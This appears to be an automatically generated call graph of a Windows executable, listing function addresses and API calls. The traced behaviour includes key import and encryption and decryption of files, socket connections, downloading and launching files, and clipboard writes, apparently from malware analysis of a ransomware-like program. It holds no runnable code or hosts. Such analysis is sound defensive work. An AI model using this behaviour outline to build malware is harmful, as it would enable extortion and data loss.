5452->5303 5454 406c5d 5453->5454 5455 406c81 SendMessageA 5453->5455 5454->5455 5456 406ca1 SendMessageA 5455->5456 5457 406cc1 SendMessageA 5455->5457 5537 406ae0 8 API calls 5456->5537 5459 406ae0 27 API calls 5457->5459 5461 406cdd 5459->5461 5460 406cba 5460->5308 5461->5308 5463 404b7a 5462->5463 5464 404b81 LoadLibraryA 5462->5464 5463->5346 5465 404b96 6 API calls 5464->5465 5466 404bf6 5464->5466 5465->5466 5466->5346 5467->5353 5469 40c50f 5468->5469 5470 40bed0 110 API calls 5469->5470 5471 40c54b 5470->5471 5472 40dd00 4 API calls 5471->5472 5476 40c596 5471->5476 5475 40c568 5472->5475 5473 40dbf0 free 5474 40c5e7 5473->5474 5474->5355 5475->5476 5478 40c600 5475->5478 5476->5473 5477 40c635 5480 40dbf0 free 5477->5480 5478->5477 5479 40c617 strncpy 5478->5479 5479->5477 5481 40c650 5480->5481 5481->5355 5487 401e60 VariantTimeToSystemTime 5482->5487 5484 401e42 5488 401de0 sprintf 5484->5488 5486 401e51 5486->5367 5487->5484 5488->5486 5490 4076d9 time 5489->5490 5491 4076d7 5490->5491 5491->5490 5492 407771 sprintf 5491->5492 5493 405180 4 API calls 5491->5493 5494 407842 SendMessageA SendMessageA #540 5491->5494 5492->5491 5493->5491 5495 407894 5494->5495 5496 4078aa _ftol #2818 #2818 5495->5496 5497 4078db #2818 #2818 5495->5497 5498 407911 #3092 #6199 5496->5498 5497->5498 5499 407990 #800 5498->5499 5500 407940 5498->5500 5499->5397 5500->5499 5501 407952 InvalidateRect 5500->5501 5502 405920 2 API calls 5501->5502 5503 407978 5502->5503 5504 405920 2 API calls 5503->5504 5504->5499 5505->5423 5506->5425 5507->5427 5531 4044c0 5508->5531 5511 404210 #858 #800 5511->5431 5535 405950 InvalidateRect 5512->5535 5514 40592d 5536 405970 InvalidateRect 5514->5536 5516 40593e 5517 405860 5516->5517 5518 405875 GetClientRect #6197 5517->5518 5519 405872 5517->5519 5518->5436 5519->5518 5521 4058d5 GetClientRect #6197 5520->5521 5522 4058d2 5520->5522 5521->5438 5522->5521 5524 40519e #860 5523->5524 5525 4051f8 5523->5525 5526 4051b1 5524->5526 5525->5440 5527 4051d1 RedrawWindow 5526->5527 5528 4051ea InvalidateRect 5526->5528 5527->5440 5528->5525 5529->5450 5530->5452 5532 4044ce GetParent #2864 SendMessageA #2860 5531->5532 5533 4044f8 GetObjectA CreateFontIndirectA #1641 5531->5533 5532->5533 5534 40427a #2818 #535 5532->5534 5533->5534 5534->5511 5535->5514 5536->5516 5538 406bda 5537->5538 5539 406b88 #537 #924 sprintf #800 #800 5537->5539 5542 406cf0 5538->5542 5539->5538 5541 406be6 #800 5541->5460 5543 406d16 5542->5543 5544 406d19 SendMessageA #353 SendMessageA #1979 5542->5544 5543->5544 5547 406dc0 SendMessageA #823 5544->5547 5548 406d7b #665 5547->5548 5549 406e00 SendMessageA 5547->5549 5548->5541 5551 406ed2 #825 5549->5551 5552 406e2f _strnicmp 5549->5552 5551->5548 5553 406e4b _strnicmp 5552->5553 5554 406e67 5552->5554 5553->5554 5554->5551 5554->5552 5555 406e87 SendMessageA #6136 5554->5555 5555->5554 6236 40db60 send 6237 40a020 TabbedTextOutA 6013 40d6a0 htons socket 6014 40d6f3 bind 6013->6014 6015 40d814 6013->6015 6016 40d809 6014->6016 6017 40d717 ioctlsocket 6014->6017 6016->6015 6018 40d80d closesocket 6016->6018 6017->6016 6019 40d732 connect select 6017->6019 6018->6015 6019->6016 6020 40d78b __WSAFDIsSet 6019->6020 6021 40d7ac ioctlsocket setsockopt setsockopt 6020->6021 6022 40d79a __WSAFDIsSet 6020->6022 6022->6016 6022->6021 5556 413102 __set_app_type __p__fmode __p__commode 5557 413171 5556->5557 5558 413185 5557->5558 5559 413179 __setusermatherr 5557->5559 5568 4133b2 _controlfp 5558->5568 5559->5558 5561 41318a _initterm __getmainargs _initterm 5562 4131de GetStartupInfoA 5561->5562 5564 413212 GetModuleHandleA 5562->5564 5569 4133e6 #1576 5564->5569 5567 413236 exit _XcptFilter 5568->5561 5569->5567 5581 4019d0 EnableWindow 6242 4043c0 #6453 #2414 5859 406380 5864 405e10 #2414 #2414 #2414 #2414 5859->5864 5861 406388 5862 40638f #825 5861->5862 5863 406398 5861->5863 5862->5863 5893 403f20 #2414 5864->5893 5866 405ed6 5894 403f20 #2414 5866->5894 5868 405eec 5895 403f20 #2414 5868->5895 5870 405f02 5896 403f20 #2414 5870->5896 5872 405f18 #2414 5897 403f20 #2414 5872->5897 5874 405f50 5898 403f20 #2414 5874->5898 5876 405f66 5899 403f20 #2414 5876->5899 5878 405f7c 6 API calls 5900 4050a0 #800 #795 5878->5900 5880 405ffe 5901 4050a0 #800 #795 5880->5901 5882 40600e 5902 404170 #2414 #800 #800 #795 5882->5902 5884 40601e 5903 404170 #2414 #800 #800 #795 5884->5903 5886 40602e 5904 404170 #2414 #800 #800 #795 5886->5904 5888 40603e 5905 404170 #2414 #800 #800 #795 5888->5905 5890 40604e #654 #765 5906 405d90 #654 #765 5890->5906 5892 406087 #609 #609 #616 #641 5892->5861 5893->5866 5894->5868 5895->5870 5896->5872 5897->5874 5898->5876 5899->5878 5900->5880 5901->5882 5902->5884 5903->5886 5904->5888 5905->5890 5906->5892 5582 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5583 405580 GetClientRect 5584 4057c9 5583->5584 5585 4055c7 7 API calls 5583->5585 5586 405666 5585->5586 5587 405669 #5785 CreateSolidBrush FillRect 5585->5587 5586->5587 5588 405770 6 API calls 5587->5588 5589 4056b2 5587->5589 5588->5584 5589->5588 5591 4056cd BitBlt 5589->5591 5591->5589 5179 405a60 5226 40b620 FindWindowW 5179->5226 5183 405aab #2514 5249 403f20 #2414 5183->5249 5185 405ae9 5250 403f20 #2414 5185->5250 5187 405b04 5251 403f20 #2414 5187->5251 5189 405b1f 5252 403f20 #2414 5189->5252 5191 405b3f 5253 403f20 #2414 5191->5253 5193 405b5a 5254 403f20 #2414 5193->5254 5195 405b75 5255 403f20 #2414 5195->5255 5197 405b90 5256 403f20 #2414 5197->5256 5199 405bab 5257 403f20 #2414 5199->5257 5201 405bc6 5258 403f20 #2414 5201->5258 5203 405be1 5259 403f20 #2414 5203->5259 5205 405bfc 5260 403f90 #2414 5205->5260 5207 405c10 5261 403f90 #2414 5207->5261 5209 405c24 #800 #800 #800 #800 #781 5262 4050a0 #800 #795 5209->5262 5211 405c9c 5263 4050a0 #800 #795 5211->5263 5213 405cb0 5264 404170 #2414 #800 #800 #795 5213->5264 5215 405cc4 5265 404170 #2414 #800 #800 #795 5215->5265 5217 405cd8 5266 404170 #2414 #800 #800 #795 5217->5266 5219 405cec 5267 404170 #2414 #800 #800 #795 5219->5267 5221 405d00 5268 405d90 #654 #765 5221->5268 5223 405d14 5269 405d90 #654 #765 5223->5269 5225 405d28 #609 #609 #616 #641 5227 40b634 7 API calls 5226->5227 5228 405a8a #1134 #2621 #6438 5226->5228 5227->5228 5229 40b687 ExitProcess 5227->5229 5230 4060e0 #324 #567 #567 #567 5228->5230 5270 4085c0 7 API calls 5230->5270 5232 406162 5233 4085c0 9 API calls 5232->5233 5234 406172 5233->5234 5274 404090 7 API calls 5234->5274 5236 406182 5275 404090 7 API calls 5236->5275 5238 406192 5276 404090 7 API calls 5238->5276 5240 4061a2 5277 404090 7 API calls 5240->5277 5242 4061b2 5278 405000 #567 #540 5242->5278 5244 4061c2 5245 405000 2 API calls 5244->5245 5246 4061d2 #567 #540 #540 #540 #540 5245->5246 5280 407640 5246->5280 5248 4062cb 7 API calls 5248->5183 5249->5185 5250->5187 5251->5189 5252->5191 5253->5193 5254->5195 5255->5197 5256->5199 5257->5201 5258->5203 5259->5205 5260->5207 5261->5209 5262->5211 5263->5213 5264->5215 5265->5217 5266->5219 5267->5221 5268->5223 5269->5225 5271 408654 5270->5271 5272 408660 #6140 5270->5272 5271->5272 5273 40865a GetSysColor 5271->5273 5272->5232 5273->5272 5274->5236 5275->5238 5276->5240 5277->5242 5279 40504a 5278->5279 5279->5244 5280->5248 5592 401140 #4710 SendMessageA SendMessageA #537 5597 401970 #3092 #6199 #800 5592->5597 5594 401199 SetTimer 5595 4011c3 CreateThread 5594->5595 5596 4011dd 5594->5596 5595->5596 5598 4012d0 5595->5598 5597->5594 5601 4012e0 sprintf sprintf GetFileAttributesA 5598->5601 5602 4013b0 fopen 5601->5602 5603 401350 5601->5603 5604 4012d9 5602->5604 5605 4013ef fread fclose sprintf fopen 5602->5605 5623 404640 InitializeCriticalSection 5603->5623 5605->5604 5607 401471 fread fclose sprintf fopen 5605->5607 5607->5604 5610 4014f2 fread fclose 5607->5610 5608 401359 5624 4047c0 5608->5624 5641 40be90 strncpy strncpy strncpy 5610->5641 5611 401377 5613 401395 DeleteFileA 5611->5613 5614 40137b 5611->5614 5640 404690 DeleteCriticalSection 5613->5640 5685 404690 DeleteCriticalSection 5614->5685 5615 401525 5642 40c240 5615->5642 5619 401575 5619->5604 5684 404640 InitializeCriticalSection 5619->5684 5621 40158c 5622 4047c0 16 API calls 5621->5622 5622->5614 5623->5608 5686 4046b0 5624->5686 5626 40484e 5627 4048f3 5626->5627 5691 4049b0 CreateFileA 5626->5691 5627->5611 5629 40486e 5630 4049b0 7 API calls 5629->5630 5634 4048e5 _local_unwind2 5629->5634 5632 40488a 5630->5632 5633 404895 CryptEncrypt 5632->5633 5632->5634 5633->5634 5635 404908 CryptDecrypt 5633->5635 5634->5627 5635->5634 5636 404932 strncmp 5635->5636 5637 40495e _local_unwind2 5636->5637 5638 404984 5636->5638 5637->5611 5700 4049a6 5638->5700 5640->5602 5641->5615 5643 40c25f 5642->5643 5644 40bed0 110 API calls 5643->5644 5645 40c29b 5644->5645 5646 40c2c8 5645->5646 5647 40c2a2 5645->5647 5650 40c2d9 SendMessageA 5646->5650 5651 40c2e5 5646->5651 5648 40c2ad SendMessageA 5647->5648 5649 40c2bc 5647->5649 5648->5649 5654 40dbf0 free 5649->5654 5650->5651 5652 40dc00 4 API calls 5651->5652 5653 40c2f8 5652->5653 5655 40dc00 4 API calls 5653->5655 5656 40c3d8 5654->5656 5657 40c313 5655->5657 5656->5619 5658 40dd00 4 API calls 5657->5658 5659 40c324 5658->5659 5660 40dd00 4 API calls 5659->5660 5661 40c335 5660->5661 5662 40dc00 4 API calls 5661->5662 5663 40c350 5662->5663 5664 40dc00 4 API calls 5663->5664 5665 40c36b 5664->5665 5666 40dc00 4 API calls 5665->5666 5667 40c37d 5666->5667 5668 40c3a9 5667->5668 5669 40c3e0 5667->5669 5672 40c3ad SendMessageA 5668->5672 5673 40c3b9 5668->5673 5670 40c3f0 5669->5670 5671 40c3e4 SendMessageA 5669->5671 5675 40c419 5670->5675 5676 40c44d 5670->5676 5671->5670 5672->5673 5674 40dbf0 free 5673->5674 5674->5656 5678 40c429 5675->5678 5679 40c41d SendMessageA 5675->5679 5677 40c49c 5676->5677 5681 40c45e fopen 5676->5681 5677->5649 5680 40c4a0 SendMessageA 5677->5680 5683 40dbf0 free 5678->5683 5679->5678 5680->5649 5681->5677 5682 40c479 fwrite fclose 5681->5682 5682->5677 5683->5656 5684->5621 5685->5604 5687 4046b7 CryptAcquireContextA 5686->5687 5688 4046e0 5687->5688 5689 4046d7 5687->5689 5688->5626 5689->5687 5690 4046dd 5689->5690 5690->5626 5692 404a1b _local_unwind2 5691->5692 5693 404a09 GetFileSize 5691->5693 5692->5629 5693->5692 5694 404a25 5693->5694 5694->5692 5696 404a38 GlobalAlloc 5694->5696 5696->5692 5697 404a49 ReadFile 5696->5697 5697->5692 5698 404a64 CryptImportKey 5697->5698 5698->5692 5699 404a81 _local_unwind2 5698->5699 5699->5629 5703 404770 5700->5703 5704 404788 5703->5704 5705 40477a CryptDestroyKey 5703->5705 5706 40478f CryptDestroyKey 5704->5706 5707 40479d 5704->5707 5705->5704 5706->5707 5708 4047b4 5707->5708 5709 4047a4 CryptReleaseContext 5707->5709 5708->5627 5709->5708 6243 406930 #6215 5710 406a00 #4476 5711 406a62 5710->5711 5712 406a23 5710->5712 5712->5711 5713 406a38 #3089 5712->5713 5713->5711 5714 406a46 #3089 5713->5714 5714->5711 5715 406a54 #3089 5714->5715 5715->5711 6244 407c30 OpenClipboard 6245 407ca9 6244->6245 6246 407c42 GlobalAlloc 6244->6246 6247 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 6246->6247 6248 407c5b CloseClipboard 6246->6248 6247->6245 5716 40d830 inet_addr 5717 40d844 gethostbyname 5716->5717 5718 40d84f 5716->5718 5717->5718 6249 40c6e0 6250 40c722 #825 6249->6250 6251 40c6ef 6249->6251 6252 40c7b0 #825 6251->6252 6253 40c70d #825 6252->6253 6253->6251 6254 40c721 6253->6254 6254->6250 6255 409fc0 TextOutA 6256 409b80 6257 409b99 6256->6257 6258 409b9d 6257->6258 6259 409ba5 #2379 6257->6259 6260 413254 _exit 6262 40ca3a 6264 40ca40 6262->6264 6263 40ca81 6264->6263 6265 40ca87 #825 6264->6265 6265->6263 6266 404f70 #4476 6267 404fc7 #3089 6266->6267 6268 404f91 6266->6268 6268->6267 6269 404f9b 6268->6269 5911 413427 5912 41342c 5911->5912 5915 4133fe #1168 5912->5915 5916 413421 5915->5916 5917 413418 _setmbcp 5915->5917 5917->5916 5918 403250 5919 40326a 5918->5919 5920 403261 #825 5918->5920 5920->5919 5719 4098a0 5724 4097e0 5719->5724 5721 4098a8 5722 4098af #825 5721->5722 5723 4098b8 5721->5723 5722->5723 5725 409815 5724->5725 5726 40981e #2414 #2414 5724->5726 5725->5726 5726->5721 5921 405080 5926 4050a0 #800 #795 5921->5926 5923 405088 5924 405098 5923->5924 5925 40508f #825 5923->5925 5925->5924 5926->5923 5727 414290 #825 6037 404280 6038 404290 6037->6038 6039 40428b 6037->6039 6041 4042a0 #6663 6038->6041 6042 4042fd #2379 6038->6042 6040 404530 5 API calls 6039->6040 6040->6038 6043 4042b5 GetParent #2864 SendMessageA #2379 6041->6043 6044 4042e7 ShellExecuteA 6041->6044 6044->6042 6273 402531 6274 402543 6273->6274 6275 40253c CloseHandle 6273->6275 6276 402555 6274->6276 6277 40254e CloseHandle 6274->6277 6275->6274 6277->6276 6045 40cf40 6053 40d300 6045->6053 6047 40cf61 6048 40cf66 6047->6048 6049 40d300 6 API calls 6047->6049 6050 40cf87 6049->6050 6051 40cf8c 6050->6051 6052 40d300 6 API calls 6050->6052 6052->6051 6054 40d31f 6053->6054 6055 40d32e 6053->6055 6054->6047 6056 40d339 6055->6056 6058 40d363 6055->6058 6059 40d378 6055->6059 6072 40d373 time 6055->6072 6056->6047 6075 40d2b0 6058->6075 6060 40d3b0 6059->6060 6061 40d380 6059->6061 6079 412a90 malloc 6060->6079 6064 40d2b0 memmove 6061->6064 6064->6072 6065 40d4b1 6065->6047 6066 40d493 6066->6065 6069 40d4a8 free 6066->6069 6067 40d3b6 6068 40d3c1 6067->6068 6071 40d2b0 memmove 6067->6071 6068->6047 6069->6065 6070 40d41e 6070->6066 6073 40d487 time 6070->6073 6074 40d469 Sleep 6070->6074 6071->6072 6072->6066 6072->6070 6073->6066 6073->6070 6074->6070 6076 40d2be 6075->6076 6078 40d2f5 6075->6078 6077 40d2c3 memmove 6076->6077 6077->6077 6077->6078 6078->6072 6079->6067 6278 401220 6279 4012c2 #2379 6278->6279 6280 401233 6278->6280 6281 40126b SendMessageA 6280->6281 6282 401243 SendMessageA KillTimer #4853 6280->6282 6283 401285 SendMessageA 6281->6283 6284 401297 6281->6284 6282->6281 6283->6284 6284->6279 6285 4012a1 SendMessageA 6284->6285 6285->6279 6286 4012b8 6285->6286 6286->6279 6293 40ca19 6294 40ca26 6293->6294 6295 40ca28 #823 6293->6295 6294->6295 5728 401110 #2302 6296 40a070 DrawTextA 6297 409ff0 ExtTextOutA 6080 401760 #6453 6081 401791 WaitForSingleObject TerminateThread CloseHandle 6080->6081 6083 4017b8 6080->6083 6081->6083 6082 40193e 6083->6082 6084 4017d8 sprintf fopen 6083->6084 6085 4018f6 6083->6085 6086 401834 8 API calls 6084->6086 6087 4018da #1200 6084->6087 6088 401903 rand 6085->6088 6090 401915 6085->6090 6086->6082 6087->6082 6088->6090 6089 401939 #1200 6089->6082 6090->6082 6090->6089 6298 403410 #4476 6299 403454 #3089 6298->6299 6301 403431 6298->6301 6300 40343b 6299->6300 6301->6299 6301->6300 5928 403271 #2302 #2302 6306 405a20 6307 405a25 6306->6307 6310 4130bb 6307->6310 6313 41308f 6310->6313 6312 405a4a 6314 4130a4 __dllonexit 6313->6314 6315 413098 _onexit 6313->6315 6314->6312 6315->6312 5729 4011f0 5730 40120b #5280 5729->5730 5731 4011fd 5729->5731 5731->5730 5732 401203 5731->5732 6316 40ceb0 6317 40cebc 6316->6317 6318 4130bb 2 API calls 6317->6318 6319 40ceda 6318->6319 6091 404620 #795 6092 40462f #825 6091->6092 6093 404638 6091->6093 6092->6093 4643 407a90 4644 407bf4 #2385 4643->4644 4645 407abd 4643->4645 4645->4644 4652 404c40 #324 #540 #860 4645->4652 4647 407ae2 #2514 4648 407b72 #2414 #2414 #800 #641 4647->4648 4649 407afb 6 API calls 4647->4649 4648->4644 4653 4082c0 4649->4653 4652->4647 4654 4082fb #4278 #858 #800 4653->4654 4655 408337 4653->4655 4654->4655 4656 408344 4655->4656 4657 408378 time 4655->4657 4660 40834d #1200 4656->4660 4661 408359 #800 4656->4661 4658 40844d time 4657->4658 4659 40839c 4657->4659 4663 4083a9 4658->4663 4664 408466 4658->4664 4659->4658 4659->4663 4660->4661 4662 407b61 #800 4661->4662 4662->4648 4665 4083bb 4663->4665 4666 40846c fopen 4663->4666 4664->4666 4667 40842e #800 4665->4667 4668 4083c4 #540 time #2818 #1200 #800 4665->4668 4669 408496 #800 4666->4669 4670 4084b5 fread fclose 4666->4670 4667->4662 4668->4667 4669->4662 4680 40be90 strncpy strncpy strncpy 4670->4680 4672 4084e7 4681 40c060 4672->4681 4674 408501 4675 408538 4674->4675 4676 408516 4674->4676 4677 40853c #1200 4675->4677 4678 408549 #800 4675->4678 4676->4678 4679 40851a #1200 time 4676->4679 4677->4678 4678->4662 4679->4678 4680->4672 4682 40c07f 4681->4682 4708 40bed0 4682->4708 4684 40c0ba 4685 40c0e7 4684->4685 4686 40c0c1 4684->4686 4687 40c0f8 SendMessageA 4685->4687 4688 40c104 4685->4688 4689 40c0cc SendMessageA 4686->4689 4690 40c0db 4686->4690 4687->4688 4727 40dd00 4688->4727 4689->4690 4692 40dbf0 free 4690->4692 4702 40c173 4692->4702 4693 40c116 4694 40c144 4693->4694 4695 40c17b 4693->4695 4697 40c148 SendMessageA 4694->4697 4698 40c154 4694->4698 4696 40c17f SendMessageA 4695->4696 4699 40c18b 4695->4699 4696->4699 4697->4698 4730 40dbf0 4698->4730 4701 40c1b4 4699->4701 4703 40c1e8 4699->4703 4704 40c1b8 SendMessageA 4701->4704 4705 40c1c4 4701->4705 4702->4674 4703->4690 4706 40c1f5 SendMessageA 4703->4706 4704->4705 4707 40dbf0 free 4705->4707 4706->4690 4707->4702 4709 40bef5 4708->4709 4710 40bf0a #823 4708->4710 4709->4710 4711 40bf2e 4710->4711 4712 40bf27 4710->4712 4714 40bf46 4711->4714 4738 40baf0 4711->4738 4734 40d5e0 4712->4734 4714->4684 4717 40bf8a GetComputerNameA GetUserNameA 4770 40dc00 4717->4770 4718 40bf72 4718->4684 4721 40dd00 4 API calls 4722 40c01f 4721->4722 4723 40dc00 4 API calls 4722->4723 4724 40c038 4723->4724 4725 40dd00 4 API calls 4724->4725 4726 40c047 4725->4726 4726->4684 4728 40dc00 4 API calls 4727->4728 4729 40dd1c 4728->4729 4729->4693 4731 40dd70 4730->4731 4733 40dd8b 4731->4733 5152 412ac0 4731->5152 4733->4702 4735 40d602 4734->4735 4779 40dad0 4735->4779 4782 40ba10 4738->4782 4740 40bb14 4741 40bdf5 4740->4741 4742 40bb42 4740->4742 4787 40ba60 4740->4787 4741->4717 4741->4718 4742->4741 4791 40c8f0 #823 4742->4791 4746 40bc30 4747 40ba60 closesocket 4746->4747 4753 40bcec GetTickCount srand 4746->4753 4751 40bc8b 4747->4751 4748 40bc1b strtok 4748->4746 4749 40bbb7 4748->4749 4749->4748 4764 40c7b0 #825 4749->4764 4793 40c7b0 4749->4793 4797 40c920 4749->4797 4809 40c800 #823 4749->4809 4752 40bc92 4751->4752 4751->4753 4813 40c860 4752->4813 4754 40bdc7 4753->4754 4755 40bd07 rand 4753->4755 4759 40c860 2 API calls 4754->4759 4758 40bd1e 4755->4758 4763 40ba60 closesocket 4758->4763 4766 40be11 4758->4766 4819 40ce50 4758->4819 4761 40bde8 #825 4759->4761 4760 40bcd8 #825 4760->4741 4761->4741 4763->4758 4764->4748 4765 40be75 #825 4765->4741 4766->4765 4825 40c740 4766->4825 4771 40dc15 4770->4771 4777 40c013 4770->4777 4772 40dc49 4771->4772 4773 40dc77 4771->4773 4771->4777 5150 412a90 malloc 4772->5150 5151 412aa0 realloc 4773->5151 4776 40dc51 4776->4777 4778 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4776->4778 4777->4721 4778->4777 4780 40dadf setsockopt send shutdown closesocket 4779->4780 4781 40d61e 4779->4781 4780->4781 4781->4711 4784 40ba27 4782->4784 4783 40ba2b 4783->4740 4784->4783 4830 40b840 sprintf GetFileAttributesA 4784->4830 4786 40ba31 4786->4740 4788 40ba88 4787->4788 5086 40d8c0 4788->5086 4792 40bb62 strtok 4791->4792 4792->4746 4792->4749 4794 40c7d0 4793->4794 4795 40c7bb 4793->4795 4794->4749 4795->4794 4796 40c7d6 #825 4795->4796 4796->4794 4798 40c932 4797->4798 4799 40c92d ?_Xlen@std@ 4797->4799 4800 40c963 4798->4800 4802 40c973 4798->4802 4805 40c946 4798->4805 4799->4798 4801 40c7b0 #825 4800->4801 4807 40c96c 4801->4807 4803 40c990 4802->4803 4804 40c7b0 #825 4802->4804 4803->4749 4804->4805 4806 40c94a 4805->4806 5090 40c9c0 4805->5090 4806->4749 4807->4749 4810 40c81f 4809->4810 5096 40cad0 4810->5096 4812 40c844 4812->4749 4814 40c8d9 4813->4814 4816 40c870 4813->4816 4814->4760 4815 40c8ab #825 4815->4816 4818 40c8cc 4815->4818 4816->4815 4817 40c8a2 #825 4816->4817 4817->4815 4818->4760 4820 40ce5a 4819->4820 4821 40ce68 4819->4821 4820->4821 4822 40ce6e #825 4820->4822 4823 40ce94 #825 4821->4823 4824 40bd9e #825 Sleep 4821->4824 4822->4821 4823->4824 4824->4754 4824->4755 4826 40c77e #825 4825->4826 4827 40c761 4825->4827 4826->4766 4828 40c775 #825 4827->4828 4829 40c76f 4827->4829 4828->4826 4829->4826 4831 40b898 4830->4831 4832 40b95b CreateProcessA 4830->4832 4848 40b6a0 CreateDirectoryA 4831->4848 4834 40b9bf WaitForSingleObject 4832->4834 4835 40b9b4 4832->4835 4836 40b9d8 WaitForSingleObject 4834->4836 4837 40b9e4 CloseHandle CloseHandle 4834->4837 4835->4786 4836->4837 4837->4786 4838 40b8a9 4839 40b8e9 sprintf GetFileAttributesA 4838->4839 4840 40b8b0 4838->4840 4842 40b946 CopyFileA 4839->4842 4843 40b93b 4839->4843 4862 40b780 CreateDirectoryA 4840->4862 4842->4832 4843->4786 4844 40b8c1 4844->4839 4845 40b780 60 API calls 4844->4845 4846 40b8d9 4845->4846 4846->4839 4847 40b8e0 4846->4847 4847->4786 4870 412920 4848->4870 4851 40b6ec 4873 412940 4851->4873 4852 40b6d8 DeleteFileA 4852->4838 4854 40b719 4854->4838 4855 40b76a 4882 412a00 4855->4882 4856 40b70e 4856->4854 4856->4855 4858 412940 14 API calls 4856->4858 4860 40b738 sprintf 4858->4860 4859 40b770 4859->4838 4879 4129e0 4860->4879 4863 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 4862->4863 4864 40b81b 4862->4864 4865 40b7f6 4863->4865 4866 40b810 DeleteFileA 4863->4866 4864->4844 4867 40b6a0 54 API calls 4865->4867 4866->4864 4868 40b809 4867->4868 4868->4866 4869 40b827 DeleteFileA 4868->4869 4869->4844 4893 4127e0 #823 4870->4893 4872 40b6cf 4872->4851 4872->4852 4874 412959 4873->4874 4876 412964 4873->4876 4874->4856 4875 412969 4875->4856 4876->4875 4919 411cf0 4876->4919 4878 412982 4878->4856 5010 412990 4879->5010 4881 4129f8 4881->4856 4883 412a09 4882->4883 4884 412a15 4882->4884 4883->4859 4885 412a1a 4884->4885 5073 4127a0 4884->5073 4885->4859 4887 412a7d #825 4887->4859 4889 412a4d 4891 412a6a #825 4889->4891 4892 412a61 #825 4889->4892 4890 412a44 #825 4890->4889 4891->4887 4892->4891 4894 41287a 4893->4894 4895 412815 4893->4895 4906 411c00 4894->4906 4895->4894 4896 41283d #823 4895->4896 4896->4894 4898 41289d 4899 4128a6 4898->4899 4900 4128f8 #823 4898->4900 4901 4128e5 4899->4901 4902 4128b4 #825 4899->4902 4903 4128bd 4899->4903 4900->4872 4901->4872 4902->4903 4904 4128d6 #825 4903->4904 4905 4128cd #825 4903->4905 4904->4901 4905->4904 4907 411c10 4906->4907 4908 411ce2 4906->4908 4907->4908 4909 411c1a GetCurrentDirectoryA 4907->4909 4908->4898 4910 411c45 4909->4910 4911 411c9e 4910->4911 4912 411c80 SetFilePointer 4910->4912 4913 4108a0 CreateFileA SetFilePointer #823 SetFilePointer 4911->4913 4912->4911 4914 411c92 4912->4914 4916 411caf 4913->4916 4914->4898 4915 411cb6 4915->4898 4916->4915 4917 410dc0 9 API calls 4916->4917 4918 411cc7 4917->4918 4918->4898 4920 412231 4919->4920 4921 411d11 4919->4921 4920->4878 4921->4920 4924 411d27 4921->4924 4952 411ac0 4921->4952 4923 411d37 4923->4878 4924->4923 4929 411dc2 4924->4929 4959 411390 4924->4959 4926 411ddc 4970 411350 4926->4970 4929->4926 4964 4113e0 4929->4964 4932 411e1c 4932->4878 4933 411e15 4933->4932 4997 410a50 4933->4997 4935 411e3e 4936 411e45 4935->4936 4937 411e56 #823 4935->4937 4936->4878 5005 410af0 4937->5005 4939 411e78 4940 411e83 #825 4939->4940 4941 411e9d _mbsstr 4939->4941 4940->4878 4943 411f15 _mbsstr 4941->4943 4943->4941 4944 411f2c _mbsstr 4943->4944 4944->4941 4945 411f43 _mbsstr 4944->4945 4945->4941 4946 411f5a 4945->4946 5009 411b80 SystemTimeToFileTime 4946->5009 4948 412063 LocalFileTimeToFileTime 4949 4120b6 4948->4949 4950 412203 4949->4950 4951 4121fa #825 4949->4951 4950->4878 4951->4950 4953 411acd 4952->4953 4956 411ad6 4952->4956 4953->4924 4954 411add 4954->4924 4955 411b02 free 4958 411b11 4955->4958 4956->4954 4956->4955 4956->4958 4957 411b2a free 4957->4924 4958->4957 4960 4113a0 4959->4960 4961 411399 4959->4961 4962 411000 SetFilePointer SetFilePointer ReadFile 4960->4962 4961->4929 4963 4113c7 4962->4963 4963->4929 4965 4113e9 4964->4965 4966 4113f0 4964->4966 4965->4929 4967 4113f7 4966->4967 4968 411000 SetFilePointer SetFilePointer ReadFile 4966->4968 4967->4929 4969 411444 4968->4969 4969->4929 4971 411000 SetFilePointer SetFilePointer ReadFile 4970->4971 4972 41137f 4971->4972 4973 411460 4972->4973 4974 410a50 SetFilePointer SetFilePointer 4973->4974 4976 411491 4974->4976 4975 411498 4975->4933 4976->4975 4977 410c00 ReadFile 4976->4977 4978 4114af 4977->4978 4979 410bb0 ReadFile 4978->4979 4980 4114d7 4979->4980 4981 410bb0 ReadFile 4980->4981 4982 4114ee 4981->4982 4983 410bb0 ReadFile 4982->4983 4984 411505 4983->4984 4985 410c00 ReadFile 4984->4985 4986 41153b 4985->4986 4987 410c00 ReadFile 4986->4987 4988 411552 4987->4988 4989 410c00 ReadFile 4988->4989 4990 411586 4989->4990 4991 410c00 ReadFile 4990->4991 4992 4115ba 4991->4992 4993 410bb0 ReadFile 4992->4993 4994 4115ee 4993->4994 4995 410bb0 ReadFile 4994->4995 4996 411621 4995->4996 4996->4933 4998 410a5a 4997->4998 4999 410aaa 4997->4999 4998->4999 5000 410a69 SetFilePointer 4998->5000 5001 410a82 4998->5001 4999->4935 5000->4935 5003 410aa4 5001->5003 5004 410a87 SetFilePointer 5001->5004 5003->4935 5004->4935 5006 410b31 5005->5006 5007 410b07 ReadFile 5005->5007 5006->4939 5008 410b22 5007->5008 5008->4939 5009->4948 5011 4129a3 5010->5011 5012 412998 5010->5012 5013 4129a8 5011->5013 5016 412360 5011->5016 5012->4881 5013->4881 5015 4129cf 5015->4881 5018 41239c 5016->5018 5020 412378 5016->5020 5017 41240e 5019 411810 SetFilePointer SetFilePointer ReadFile 5017->5019 5018->5017 5023 411ac0 free free 5018->5023 5030 4123b7 5018->5030 5027 412431 5019->5027 5021 41238a 5020->5021 5025 411ac0 free free 5020->5025 5029 4124ab 5020->5029 5021->5015 5022 4123c8 5022->5015 5023->5030 5024 4124bf 5024->5015 5025->5029 5026 4124dc 5034 4124f6 5026->5034 5039 4113e0 SetFilePointer SetFilePointer ReadFile 5026->5039 5028 412442 5027->5028 5031 411ac0 free free 5027->5031 5028->5015 5029->5024 5029->5026 5032 411390 SetFilePointer SetFilePointer ReadFile 5029->5032 5030->5022 5035 411390 SetFilePointer SetFilePointer ReadFile 5030->5035 5041 4123e5 5030->5041 5031->5028 5032->5026 5033 4123ff 5036 411660 8 API calls 5033->5036 5037 411cf0 14 API calls 5034->5037 5035->5041 5036->5017 5040 412506 5037->5040 5038 4113e0 SetFilePointer SetFilePointer ReadFile 5038->5041 5039->5026 5051 412510 5040->5051 5055 412578 